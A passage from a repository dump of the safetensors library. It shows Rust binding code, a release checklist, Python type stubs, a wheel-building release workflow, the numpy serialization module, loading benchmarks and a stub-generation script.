113 | // XXX Ideally this would be true.
114 | // if !data.readonly() {
115 | // return Err(SafetensorError::new_err("Python buffer is not readonly"));
116 | // }
117 | let data_len = data.item_count();
118 | let py = pydata.py();
119 | PyView {
120 | shape,
121 | dtype,
122 | data,
123 | data_len,
124 | _py: py,
125 | }
126 | };
127 |
128 | #[cfg(feature = "py38")]
129 | let tensor = {
130 | let data: &[u8] = pydata.extract()?;
131 | let data_len = data.len();
132 |             let data: PyBound<PyBytes> = pydata.extract()?;
133 | PyView {
134 | shape,
135 | dtype,
136 | data,
137 | data_len,
138 | }
139 | };
140 |
141 | tensors.insert(tensor_name.to_string(), tensor);
142 | }
143 | Ok(tensors)
144 | }
145 |
--------------------------------------------------------------------------------
/RELEASE.md:
--------------------------------------------------------------------------------
1 | # How to release
2 |
3 | ## Before the release
4 |
5 | Simple checklist on how to make releases for `safetensors`.
6 |
7 | - Freeze `main` branch.
8 | - Run all tests (Check CI has properly run)
9 | - If any significant work, check benchmarks:
10 | - `cd safetensors && cargo bench` (needs to be run on latest release tag to measure difference if it's your first time)
11 | - Run all `transformers` tests. (`transformers` is a big user of `safetensors` we need
12 | to make sure we don't break it, testing is one way to make sure nothing unforeseen
13 | has been done.)
14 | - Run all fast tests at the VERY least (not just the tokenization tests). (`RUN_PIPELINE_TESTS=1 CUDA_VISIBLE_DEVICES=-1 pytest -sv tests/`)
15 | - When all *fast* tests work, then we can also (it's recommended) run the whole `transformers`
16 | test suite.
17 | - Rebase this [PR](https://github.com/huggingface/transformers/pull/16708).
18 | This will create new docker images ready to run the tests suites with `safetensors` from the main branch.
19 | - Wait for actions to finish
20 | - Rebase this [PR](https://github.com/huggingface/transformers/pull/16712)
21 | This will run the actual full test suite.
22 | - Check the results.
23 | - **If any breaking change has been done**, make sure the version can safely be increased for transformers users (the `safetensors` version pin needs to ensure users don't upgrade before `transformers` has). [link](https://github.com/huggingface/transformers/blob/main/setup.py#L154)
24 | For instance `safetensors>=0.10,<0.11`, so we can safely upgrade to `0.11` without impacting
25 | current users.
26 | - Then start a new PR containing all desired code changes from the following steps.
27 | - You will `Create release` after the code modifications are on `master`.
28 |
29 | ## Rust
30 |
31 | - `safetensors` (rust, python & node) versions don't have to be in sync but it's
32 | very common to release for all versions at once for new features.
33 | - Edit `Cargo.toml` to reflect new version
34 | - Edit `CHANGELOG.md`:
35 | - Add relevant PRs that were added (python PRs do not belong for instance).
36 | - Add links at the end of the files.
37 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
38 | - Create new Release:
39 | - Mark it as pre-release
40 | - Use new version name with a new tag (create on publish) `vX.X.X`.
41 | - Copy paste the new part of the `CHANGELOG.md`
42 | - ⚠️ Click on `Publish release`. This will start the whole process of building and uploading
43 | the new version to `crates.io`; there's no going back after this.
44 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
45 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again.
46 |
47 |
48 | ## Python
49 |
50 | - Edit `bindings/python/setup.py` to reflect new version.
51 | - Edit `bindings/python/py_src/safetensors/__init__.py` to reflect new version.
52 | - Edit `CHANGELOG.md`:
53 | - Add relevant PRs that were added (node PRs do not belong for instance).
54 | - Add links at the end of the files.
55 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
56 | - Create new Release:
57 | - Mark it as pre-release
58 | - Use new version name with a new tag (create on publish) `python-vX.X.X`.
59 | - Copy paste the new part of the `CHANGELOG.md`
60 | - ⚠️ Click on `Publish release`. This will start the whole process of building and uploading
61 | the new version to `pypi`; there's no going back after this.
62 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
63 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again.
64 | - This CI/CD has 3 distinct builds, `Pypi`(normal), `conda` and `extra`. `Extra` is REALLY slow (~4h), this is normal since it has to rebuild many things, but enables the wheel to be available for old Linuxes
65 |
66 | ## Node
67 |
68 | - Edit `bindings/node/package.json` to reflect new version.
69 | - Edit `CHANGELOG.md`:
70 | - Add relevant PRs that were added (python PRs do not belong for instance).
71 | - Add links at the end of the files.
72 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
73 | - Create new Release:
74 | - Mark it as pre-release
75 | - Use new version name with a new tag (create on publish) `node-vX.X.X`.
76 | - Copy paste the new part of the `CHANGELOG.md`
77 | - ⚠️ Click on `Publish release`. This will start the whole process of building and uploading
78 | the new version to `npm`; there's no going back after this.
79 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
80 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again.
81 |
82 |
83 | ## Testing the CI/CD for release
84 |
85 |
86 | If you want to make modifications to the CI/CD of the release GH actions, you need
87 | to:
88 | - **Comment the part that uploads the artifacts** to `crates.io`, `PyPi` or `npm`.
89 | - Change the trigger mechanism so it can trigger every time you push to your branch.
90 | - Keep pushing your changes until the artifacts are properly created.
91 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/__init__.pyi:
--------------------------------------------------------------------------------
1 | # Generated content DO NOT EDIT
2 | @staticmethod
3 | def deserialize(bytes):
4 | """
5 | Deserializes the raw bytes of a safetensors file and returns its tensors.
6 |
7 | Args:
8 | data (`bytes`):
9 | The byte content of a file
10 |
11 | Returns:
12 | (`List[Tuple[str, Dict[str, Any]]]`):
13 | The deserialized content is like:
14 | [("tensor_name", {"shape": [2, 3], "dtype": "F32", "data": b"\0\0.." }), (...)]
15 | """
16 | pass
17 |
18 | @staticmethod
19 | def serialize(tensor_dict, metadata=None):
20 | """
21 | Serializes raw data.
22 |
23 | NOTE: the caller is required to ensure any pointer passed via `data_ptr` is valid and will live
24 | long enough for the duration of the serialization.
25 | We will remove the need for the caller to hold references themselves when we drop support for
26 | python versions prior to 3.11 where the `PyBuffer` API is available.
27 | Creating a `PyBuffer` will enable us to hold a reference to each passed in data array,
28 | increasing its ref count preventing the gc from collecting it while we serialize.
29 |
30 | Args:
31 | tensor_dict (`Dict[str, Dict[Any]]`):
32 | The tensor dict is like:
33 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data_ptr": 1234, "data_len": 24}}
34 | metadata (`Dict[str, str]`, *optional*):
35 | The optional purely text annotations
36 |
37 | Returns:
38 | (`bytes`):
39 | The serialized content.
40 | """
41 | pass
42 |
43 | @staticmethod
44 | def serialize_file(tensor_dict, filename, metadata=None):
45 | """
46 | Serializes raw data into file.
47 |
48 | NOTE: the caller is required to ensure any pointer passed via `data_ptr` is valid and will live
49 | long enough for the duration of the serialization.
50 | We will remove the need for the caller to hold references themselves when we drop support for
51 | python versions prior to 3.11 where the `PyBuffer` API is available.
52 | Creating a `PyBuffer` will enable us to hold a reference to each passed in data array,
53 | increasing its ref count preventing the gc from collecting it while we serialize.
54 |
55 | Args:
56 | tensor_dict (`Dict[str, Dict[Any]]`):
57 | The tensor dict is like:
58 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data_ptr": 1234, "data_len": 24}}
59 | filename (`str`, or `os.PathLike`):
60 | The name of the file to write into.
61 | metadata (`Dict[str, str]`, *optional*):
62 | The optional purely text annotations
63 |
64 | Returns:
65 | (`NoneType`):
66 | On success return None
67 | """
68 | pass
69 |
70 | class safe_open:
71 | """
72 | Opens a safetensors lazily and returns tensors as asked
73 |
74 | Args:
75 | filename (`str`, or `os.PathLike`):
76 | The filename to open
77 |
78 | framework (`str`):
79 | The framework you want your tensors in. Supported values:
80 | `pt`, `tf`, `flax`, `numpy`.
81 |
82 | device (`str`, defaults to `"cpu"`):
83 | The device on which you want the tensors.
84 | """
85 | def __init__(self, filename, framework, device=...):
86 | pass
87 |
88 | def __enter__(self):
89 | """
90 | Start the context manager
91 | """
92 | pass
93 |
94 | def __exit__(self, _exc_type, _exc_value, _traceback):
95 | """
96 | Exits the context manager
97 | """
98 | pass
99 |
100 | def get_slice(self, name):
101 | """
102 | Returns a full slice view object
103 |
104 | Args:
105 | name (`str`):
106 | The name of the tensor you want
107 |
108 | Returns:
109 | (`PySafeSlice`):
110 | A dummy object you can slice into to get a real tensor
111 | Example:
112 | ```python
113 | from safetensors import safe_open
114 |
115 | with safe_open("model.safetensors", framework="pt", device=0) as f:
116 | tensor_part = f.get_slice("embedding")[:, ::8]
117 |
118 | ```
119 | """
120 | pass
121 |
122 | def get_tensor(self, name):
123 | """
124 | Returns a full tensor
125 |
126 | Args:
127 | name (`str`):
128 | The name of the tensor you want
129 |
130 | Returns:
131 | (`Tensor`):
132 | The tensor in the framework you opened the file for.
133 |
134 | Example:
135 | ```python
136 | from safetensors import safe_open
137 |
138 | with safe_open("model.safetensors", framework="pt", device=0) as f:
139 | tensor = f.get_tensor("embedding")
140 |
141 | ```
142 | """
143 | pass
144 |
145 | def keys(self):
146 | """
147 | Returns the names of the tensors in the file.
148 |
149 | Returns:
150 | (`List[str]`):
151 | The name of the tensors contained in that file
152 | """
153 | pass
154 |
155 | def metadata(self):
156 | """
157 | Return the special non tensor information in the header
158 |
159 | Returns:
160 | (`Dict[str, str]`):
161 | The freeform metadata.
162 | """
163 | pass
164 |
165 | def offset_keys(self):
166 | """
167 | Returns the names of the tensors in the file, ordered by offset.
168 |
169 | Returns:
170 | (`List[str]`):
171 | The name of the tensors contained in that file
172 | """
173 | pass
174 |
175 | class SafetensorError(Exception):
176 | """
177 | Custom Python Exception for Safetensor errors.
178 | """
179 |
--------------------------------------------------------------------------------
/.github/workflows/python-release.yml:
--------------------------------------------------------------------------------
1 | # This file is autogenerated by maturin v1.7.4
2 | # To update, run
3 | #
4 | # maturin generate-ci github -m bindings/python/Cargo.toml
5 | #
6 | name: CI
7 |
8 | on:
9 | push:
10 | branches:
11 | - main
12 | - master
13 | tags:
14 | - '*'
15 | pull_request:
16 | workflow_dispatch:
17 |
18 | permissions:
19 | contents: read
20 |
21 | jobs:
22 | linux:
23 | runs-on: ${{ matrix.platform.runner }}
24 | strategy:
25 | matrix:
26 | platform:
27 | - runner: ubuntu-latest
28 | target: x86_64
29 | - runner: ubuntu-latest
30 | target: x86
31 | - runner: ubuntu-latest
32 | target: aarch64
33 | - runner: ubuntu-latest
34 | target: armv7
35 | - runner: ubuntu-latest
36 | target: s390x
37 | - runner: ubuntu-latest
38 | target: ppc64le
39 | steps:
40 | - uses: actions/checkout@v6
41 | - uses: actions/setup-python@v6
42 | with:
43 | python-version: 3.x
44 | - name: Build wheels
45 | uses: PyO3/maturin-action@v1
46 | with:
47 | target: ${{ matrix.platform.target }}
48 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
49 | sccache: 'true'
50 | manylinux: auto
51 | - name: Upload wheels
52 | uses: actions/upload-artifact@v6
53 | with:
54 | name: wheels-linux-${{ matrix.platform.target }}
55 | path: dist
56 |
57 | musllinux:
58 | runs-on: ${{ matrix.platform.runner }}
59 | strategy:
60 | matrix:
61 | platform:
62 | - runner: ubuntu-latest
63 | target: x86_64
64 | - runner: ubuntu-latest
65 | target: x86
66 | - runner: ubuntu-latest
67 | target: aarch64
68 | - runner: ubuntu-latest
69 | target: armv7
70 | steps:
71 | - uses: actions/checkout@v6
72 | - uses: actions/setup-python@v6
73 | with:
74 | python-version: 3.x
75 | - name: Build wheels
76 | uses: PyO3/maturin-action@v1
77 | with:
78 | target: ${{ matrix.platform.target }}
79 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
80 | sccache: 'true'
81 | manylinux: musllinux_1_2
82 | - name: Upload wheels
83 | uses: actions/upload-artifact@v6
84 | with:
85 | name: wheels-musllinux-${{ matrix.platform.target }}
86 | path: dist
87 |
88 | windows:
89 | runs-on: ${{ matrix.platform.runner }}
90 | strategy:
91 | matrix:
92 | platform:
93 | - runner: windows-latest
94 | target: x64
95 | - runner: windows-latest
96 | target: x86
97 | - runner: windows-11-arm
98 | target: arm64
99 | steps:
100 | - uses: actions/checkout@v6
101 | - uses: actions/setup-python@v6
102 | with:
103 | python-version: 3.x
104 | architecture: ${{ matrix.platform.target }}
105 | - name: Build wheels
106 | uses: PyO3/maturin-action@v1
107 | with:
108 | target: ${{ matrix.platform.target == 'arm64' && 'aarch64-pc-windows-msvc' || matrix.platform.target }}
109 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
110 | sccache: 'true'
111 | - name: Upload wheels
112 | uses: actions/upload-artifact@v6
113 | with:
114 | name: wheels-windows-${{ matrix.platform.target }}
115 | path: dist
116 |
117 | macos:
118 | runs-on: ${{ matrix.platform.runner }}
119 | strategy:
120 | matrix:
121 | platform:
122 | - runner: macos-15-intel
123 | target: x86_64
124 | - runner: macos-14
125 | target: aarch64
126 | steps:
127 | - uses: actions/checkout@v6
128 | - uses: actions/setup-python@v6
129 | with:
130 | python-version: 3.x
131 | - name: Build wheels
132 | uses: PyO3/maturin-action@v1
133 | with:
134 | target: ${{ matrix.platform.target }}
135 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
136 | sccache: 'true'
137 | - name: Upload wheels
138 | uses: actions/upload-artifact@v6
139 | with:
140 | name: wheels-macos-${{ matrix.platform.target }}
141 | path: dist
142 |
143 | sdist:
144 | runs-on: ubuntu-latest
145 | steps:
146 | - uses: actions/checkout@v6
147 | - name: Build sdist
148 | uses: PyO3/maturin-action@v1
149 | with:
150 | command: sdist
151 | args: --out dist --manifest-path bindings/python/Cargo.toml
152 | - name: Upload sdist
153 | uses: actions/upload-artifact@v6
154 | with:
155 | name: wheels-sdist
156 | path: dist
157 |
158 | release:
159 | name: Release
160 | runs-on: ubuntu-latest
161 | if: ${{ startsWith(github.ref, 'refs/tags/') || github.event_name == 'workflow_dispatch' }}
162 | needs: [linux, musllinux, windows, macos, sdist]
163 | permissions:
164 | # Use to sign the release artifacts
165 | id-token: write
166 | # Used to upload release artifacts
167 | contents: write
168 | # Used to generate artifact attestation
169 | attestations: write
170 | steps:
171 | - uses: actions/download-artifact@v7
172 | - name: Generate artifact attestation
173 | uses: actions/attest-build-provenance@v3
174 | with:
175 | subject-path: 'wheels-*/*'
176 | - name: Publish to PyPI
177 | if: "startsWith(github.ref, 'refs/tags/')"
178 | uses: PyO3/maturin-action@v1
179 | env:
180 | MATURIN_PYPI_TOKEN: ${{ secrets.PYPI_TOKEN_DIST}}
181 | with:
182 | command: upload
183 | args: --non-interactive --skip-existing wheels-*/*
184 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/numpy.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | from typing import Dict, List, Optional, Union
4 |
5 | import numpy as np
6 |
7 | from safetensors import deserialize, safe_open, serialize, serialize_file
8 |
9 |
10 | def _flatten(
11 | tensor_dict: Dict[str, np.ndarray], keep_alive_buffer: List
12 | ) -> Dict[str, Dict]:
13 | flattened = {}
14 | for k, v in tensor_dict.items():
15 | tensor = v
16 | if not _is_little_endian(tensor):
17 | tensor = tensor.byteswap(inplace=False)
18 | keep_alive_buffer.append(tensor)
19 | flattened[k] = {
20 | "dtype": tensor.dtype.name,
21 | "shape": tensor.shape,
22 | "data_ptr": tensor.ctypes.data,
23 | "data_len": tensor.nbytes,
24 | }
25 | return flattened
26 |
27 |
28 | def save(
29 | tensor_dict: Dict[str, np.ndarray], metadata: Optional[Dict[str, str]] = None
30 | ) -> bytes:
31 | """
32 | Saves a dictionary of tensors into raw bytes in safetensors format.
33 |
34 | Args:
35 | tensor_dict (`Dict[str, np.ndarray]`):
36 | The incoming tensors. Tensors need to be contiguous and dense.
37 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
38 | Optional text only metadata you might want to save in your header.
39 | For instance it can be useful to specify more about the underlying
40 | tensors. This is purely informative and does not affect tensor loading.
41 |
42 | Returns:
43 | `bytes`: The raw bytes representing the format
44 |
45 | Example:
46 |
47 | ```python
48 | from safetensors.numpy import save
49 | import numpy as np
50 |
51 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))}
52 | byte_data = save(tensors)
53 | ```
54 | """
55 | keep_alive_buffer = [] # to keep byteswapped tensors alive
56 | serialized = serialize(_flatten(tensor_dict, keep_alive_buffer), metadata=metadata)
57 | result = bytes(serialized)
58 | return result
59 |
60 |
61 | def save_file(
62 | tensor_dict: Dict[str, np.ndarray],
63 | filename: Union[str, os.PathLike],
64 | metadata: Optional[Dict[str, str]] = None,
65 | ) -> None:
66 | """
67 | Saves a dictionary of tensors into a file in safetensors format.
68 |
69 | Args:
70 | tensor_dict (`Dict[str, np.ndarray]`):
71 | The incoming tensors. Tensors need to be contiguous and dense.
72 | filename (`str`, or `os.PathLike`)):
73 | The filename we're saving into.
74 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
75 | Optional text only metadata you might want to save in your header.
76 | For instance it can be useful to specify more about the underlying
77 | tensors. This is purely informative and does not affect tensor loading.
78 |
79 | Returns:
80 | `None`
81 |
82 | Example:
83 |
84 | ```python
85 | from safetensors.numpy import save_file
86 | import numpy as np
87 |
88 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))}
89 | save_file(tensors, "model.safetensors")
90 | ```
91 | """
92 | keep_alive_buffer = [] # to keep byteswapped tensors alive
93 | serialize_file(
94 | _flatten(tensor_dict, keep_alive_buffer), filename, metadata=metadata
95 | )
96 |
97 |
98 | def load(data: bytes) -> Dict[str, np.ndarray]:
99 | """
100 | Loads a safetensors file into numpy format from pure bytes.
101 |
102 | Args:
103 | data (`bytes`):
104 | The content of a safetensors file
105 |
106 | Returns:
107 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` on cpu
108 |
109 | Example:
110 |
111 | ```python
112 | from safetensors.numpy import load
113 |
114 | file_path = "./my_folder/bert.safetensors"
115 | with open(file_path, "rb") as f:
116 | data = f.read()
117 |
118 | loaded = load(data)
119 | ```
120 | """
121 | flat = deserialize(data)
122 | return _view2np(flat)
123 |
124 |
125 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, np.ndarray]:
126 | """
127 | Loads a safetensors file into numpy format.
128 |
129 | Args:
130 | filename (`str`, or `os.PathLike`)):
131 | The name of the file which contains the tensors
132 |
133 | Returns:
134 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray`
135 |
136 | Example:
137 |
138 | ```python
139 | from safetensors.numpy import load_file
140 |
141 | file_path = "./my_folder/bert.safetensors"
142 | loaded = load_file(file_path)
143 | ```
144 | """
145 | result = {}
146 | with safe_open(filename, framework="np") as f:
147 | for k in f.offset_keys():
148 | result[k] = f.get_tensor(k)
149 | return result
150 |
151 |
152 | _TYPES = {
153 | "F64": np.float64,
154 | "F32": np.float32,
155 | "F16": np.float16,
156 | "I64": np.int64,
157 | "U64": np.uint64,
158 | "I32": np.int32,
159 | "U32": np.uint32,
160 | "I16": np.int16,
161 | "U16": np.uint16,
162 | "I8": np.int8,
163 | "U8": np.uint8,
164 | "BOOL": bool,
165 | "C64": np.complex64,
166 | }
167 |
168 |
169 | def _getdtype(dtype_str: str) -> np.dtype:
170 | return _TYPES[dtype_str]
171 |
172 |
173 | def _view2np(safeview) -> Dict[str, np.ndarray]:
174 | result = {}
175 | for k, v in safeview:
176 | dtype = _getdtype(v["dtype"])
177 | arr = np.frombuffer(v["data"], dtype=dtype).reshape(v["shape"])
178 | result[k] = arr
179 | return result
180 |
181 |
182 | def _is_little_endian(tensor: np.ndarray) -> bool:
183 | byteorder = tensor.dtype.byteorder
184 | if byteorder == "=":
185 | if sys.byteorder == "little":
186 | return True
187 | else:
188 | return False
189 | elif byteorder == "|":
190 | return True
191 | elif byteorder == "<":
192 | return True
193 | elif byteorder == ">":
194 | return False
195 | raise ValueError(f"Unexpected byte order {byteorder}")
196 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_pt.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import pytest
5 | import torch
6 |
7 | from safetensors.torch import load_file, save_file
8 |
9 |
10 | def create_gpt2(n_layers: int):
11 | tensors = {}
12 | tensors["wte"] = torch.zeros((50257, 768))
13 | tensors["wpe"] = torch.zeros((1024, 768))
14 | for i in range(n_layers):
15 | tensors[f"h.{i}.ln_1.weight"] = torch.zeros((768,))
16 | tensors[f"h.{i}.ln_1.bias"] = torch.zeros((768,))
17 | tensors[f"h.{i}.attn.bias"] = torch.zeros((1, 1, 1024, 1024))
18 | tensors[f"h.{i}.attn.c_attn.weight"] = torch.zeros((768, 2304))
19 | tensors[f"h.{i}.attn.c_attn.bias"] = torch.zeros((2304))
20 | tensors[f"h.{i}.attn.c_proj.weight"] = torch.zeros((768, 768))
21 | tensors[f"h.{i}.attn.c_proj.bias"] = torch.zeros((768))
22 | tensors[f"h.{i}.ln_2.weight"] = torch.zeros((768))
23 | tensors[f"h.{i}.ln_2.bias"] = torch.zeros((768))
24 | tensors[f"h.{i}.mlp.c_fc.weight"] = torch.zeros((768, 3072))
25 | tensors[f"h.{i}.mlp.c_fc.bias"] = torch.zeros((3072))
26 | tensors[f"h.{i}.mlp.c_proj.weight"] = torch.zeros((3072, 768))
27 | tensors[f"h.{i}.mlp.c_proj.bias"] = torch.zeros((768))
28 | tensors["ln_f.weight"] = torch.zeros((768))
29 | tensors["ln_f.bias"] = torch.zeros((768))
30 | return tensors
31 |
32 |
33 | def create_lora(n_layers: int):
34 | tensors = {}
35 | for i in range(n_layers):
36 | tensors[f"lora.{i}.up.weight"] = torch.zeros((32, 32))
37 | tensors[f"lora.{i}.down.weight"] = torch.zeros((32, 32))
38 | return tensors
39 |
40 |
41 | def test_pt_pt_load_cpu(benchmark):
42 | # benchmark something
43 | weights = create_gpt2(12)
44 | with tempfile.NamedTemporaryFile(delete=False) as f:
45 | torch.save(weights, f)
46 | result = benchmark(torch.load, f.name)
47 | os.unlink(f.name)
48 |
49 | for k, v in weights.items():
50 | tv = result[k]
51 | assert torch.allclose(v, tv)
52 |
53 |
54 | def test_pt_sf_load_cpu(benchmark):
55 | # benchmark something
56 | weights = create_gpt2(12)
57 | with tempfile.NamedTemporaryFile(delete=False) as f:
58 | save_file(weights, f.name)
59 | result = benchmark(load_file, f.name)
60 | os.unlink(f.name)
61 |
62 | for k, v in weights.items():
63 | tv = result[k]
64 | assert torch.allclose(v, tv)
65 |
66 |
67 | def test_pt_pt_load_cpu_small(benchmark):
68 | weights = create_lora(500)
69 | with tempfile.NamedTemporaryFile(delete=False) as f:
70 | torch.save(weights, f)
71 | result = benchmark(torch.load, f.name)
72 | os.unlink(f.name)
73 |
74 | for k, v in weights.items():
75 | tv = result[k]
76 | assert torch.allclose(v, tv)
77 |
78 |
79 | def test_pt_sf_load_cpu_small(benchmark):
80 | weights = create_lora(500)
81 |
82 | with tempfile.NamedTemporaryFile(delete=False) as f:
83 | save_file(weights, f.name)
84 | result = benchmark(load_file, f.name)
85 | os.unlink(f.name)
86 |
87 | for k, v in weights.items():
88 | tv = result[k]
89 | assert torch.allclose(v, tv)
90 |
91 |
92 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda")
93 | def test_pt_pt_load_gpu(benchmark):
94 | # benchmark something
95 | weights = create_gpt2(12)
96 | with tempfile.NamedTemporaryFile(delete=False) as f:
97 | torch.save(weights, f)
98 | result = benchmark(torch.load, f.name, map_location="cuda:0")
99 | os.unlink(f.name)
100 |
101 | for k, v in weights.items():
102 | v = v.cuda()
103 | tv = result[k]
104 | assert torch.allclose(v, tv)
105 |
106 |
107 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda")
108 | def test_pt_sf_load_gpu(benchmark):
109 | # benchmark something
110 | weights = create_gpt2(12)
111 | with tempfile.NamedTemporaryFile(delete=False) as f:
112 | save_file(weights, f.name)
113 | result = benchmark(load_file, f.name, device="cuda:0")
114 | os.unlink(f.name)
115 |
116 | for k, v in weights.items():
117 | v = v.cuda()
118 | tv = result[k]
119 | assert torch.allclose(v, tv)
120 |
121 |
122 | @pytest.mark.skipif(
123 | not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(),
124 | reason="requires mps",
125 | )
126 | def test_pt_pt_load_mps(benchmark):
127 | # benchmark something
128 | weights = create_gpt2(12)
129 | with tempfile.NamedTemporaryFile(delete=False) as f:
130 | torch.save(weights, f)
131 | result = benchmark(torch.load, f.name, map_location="mps")
132 | os.unlink(f.name)
133 |
134 | for k, v in weights.items():
135 | v = v.to(device="mps")
136 | tv = result[k]
137 | assert torch.allclose(v, tv)
138 |
139 |
140 | @pytest.mark.skipif(
141 | not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(),
142 | reason="requires mps",
143 | )
144 | def test_pt_sf_load_mps(benchmark):
145 | # benchmark something
146 | weights = create_gpt2(12)
147 | with tempfile.NamedTemporaryFile(delete=False) as f:
148 | save_file(weights, f.name)
149 | result = benchmark(load_file, f.name, device="mps")
150 | os.unlink(f.name)
151 |
152 | for k, v in weights.items():
153 | v = v.to(device="mps")
154 | tv = result[k]
155 | assert torch.allclose(v, tv)
156 |
157 |
158 | def test_pt_sf_save_cpu(benchmark):
159 | weights = create_gpt2(12)
160 |
161 | filename = "tmp.safetensors"
162 |
163 | # XXX: On some platforms (tested on Linux x86_64 ext4), writing to an already existing file is slower than creating a new one.
164 | # On others, such as MacOS (APFS), it's the opposite. To have more consistent benchmarks,
165 | # we ensure the file does not exist before each write, which is also closer to real world usage.
166 | def setup():
167 | try:
168 | os.unlink(filename)
169 | except Exception:
170 | pass
171 |
172 | benchmark.pedantic(
173 | save_file, args=(weights, filename), setup=setup, iterations=1, rounds=5
174 | )
175 |
176 | # Clean up files
177 | os.unlink(filename)
178 |
--------------------------------------------------------------------------------
/bindings/python/stub.py:
--------------------------------------------------------------------------------
1 | import argparse
2 | import inspect
3 | import os
4 | import subprocess
5 | import tempfile
6 |
7 | INDENT = " " * 4
8 | GENERATED_COMMENT = "# Generated content DO NOT EDIT\n"
9 |
10 |
11 | def do_indent(text: str, indent: str):
12 | return text.replace("\n", f"\n{indent}")
13 |
14 |
15 | def function(obj, indent, text_signature=None):
16 | if text_signature is None:
17 | text_signature = obj.__text_signature__
18 | string = ""
19 | string += f"{indent}def {obj.__name__}{text_signature}:\n"
20 | indent += INDENT
21 | string += f'{indent}"""\n'
22 | string += f"{indent}{do_indent(obj.__doc__, indent)}\n"
23 | string += f'{indent}"""\n'
24 | string += f"{indent}pass\n"
25 | string += "\n"
26 | string += "\n"
27 | return string
28 |
29 |
30 | def member_sort(member):
31 | if inspect.isclass(member):
32 | value = 10 + len(inspect.getmro(member))
33 | else:
34 | value = 1
35 | return value
36 |
37 |
38 | def fn_predicate(obj):
39 | value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj)
40 | if value:
41 | return (
42 | obj.__doc__
43 | and obj.__text_signature__
44 | and (
45 | not obj.__name__.startswith("_")
46 | or obj.__name__ in {"__enter__", "__exit__"}
47 | )
48 | )
49 | if inspect.isgetsetdescriptor(obj):
50 | return obj.__doc__ and not obj.__name__.startswith("_")
51 | return False
52 |
53 |
54 | def get_module_members(module):
55 | members = [
56 | member
57 | for name, member in inspect.getmembers(module)
58 | if not name.startswith("_") and not inspect.ismodule(member)
59 | ]
60 | members.sort(key=member_sort)
61 | return members
62 |
63 |
64 | def pyi_file(obj, indent=""):
65 | string = ""
66 | if inspect.ismodule(obj):
67 | string += GENERATED_COMMENT
68 | members = get_module_members(obj)
69 | for member in members:
70 | string += pyi_file(member, indent)
71 |
72 | elif inspect.isclass(obj):
73 | indent += INDENT
74 | mro = inspect.getmro(obj)
75 | if len(mro) > 2:
76 | inherit = f"({mro[1].__name__})"
77 | else:
78 | inherit = ""
79 | string += f"class {obj.__name__}{inherit}:\n"
80 |
81 | body = ""
82 | if obj.__doc__:
83 | body += (
84 | f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n'
85 | )
86 |
87 | fns = inspect.getmembers(obj, fn_predicate)
88 |
89 | # Init
90 | if obj.__text_signature__:
91 | signature = obj.__text_signature__.replace("(", "(self, ")
92 | body += f"{indent}def __init__{signature}:\n"
93 | body += f"{indent + INDENT}pass\n"
94 | body += "\n"
95 |
96 | for name, fn in fns:
97 | body += pyi_file(fn, indent=indent)
98 |
99 | if not body:
100 | body += f"{indent}pass\n"
101 |
102 | string += body
103 | string += "\n\n"
104 |
105 | elif inspect.isbuiltin(obj):
106 | string += f"{indent}@staticmethod\n"
107 | string += function(obj, indent)
108 |
109 | elif inspect.ismethoddescriptor(obj):
110 | string += function(obj, indent)
111 |
112 | elif inspect.isgetsetdescriptor(obj):
113 | # TODO it would be interesting to add the setter maybe?
114 | string += f"{indent}@property\n"
115 | string += function(obj, indent, text_signature="(self)")
116 | else:
117 | raise Exception(f"Object {obj} is not supported")
118 | return string
119 |
120 |
121 | def py_file(module, origin):
122 | members = get_module_members(module)
123 |
124 | string = GENERATED_COMMENT
125 | string += f"from .. import {origin}\n"
126 | string += "\n"
127 | for member in members:
128 | name = member.__name__
129 | string += f"{name} = {origin}.{name}\n"
130 | return string
131 |
132 |
133 | def do_black(content):
134 | content = content.replace("$self", "self")
135 | with tempfile.NamedTemporaryFile(mode="w+", suffix=".pyi") as f:
136 | f.write(content)
137 | f.flush()
138 | _ = subprocess.check_output(["ruff", "format", f.name])
139 | f.seek(0)
140 | new_content = f.read()
141 | return new_content
142 |
143 |
144 | def write(module, directory, origin, check=False):
145 | submodules = [
146 | (name, member)
147 | for name, member in inspect.getmembers(module)
148 | if inspect.ismodule(member)
149 | ]
150 |
151 | filename = os.path.join(directory, "__init__.pyi")
152 | pyi_content = pyi_file(module)
153 | pyi_content = do_black(pyi_content)
154 | os.makedirs(directory, exist_ok=True)
155 | if check:
156 | with open(filename, "r") as f:
157 | data = f.read()
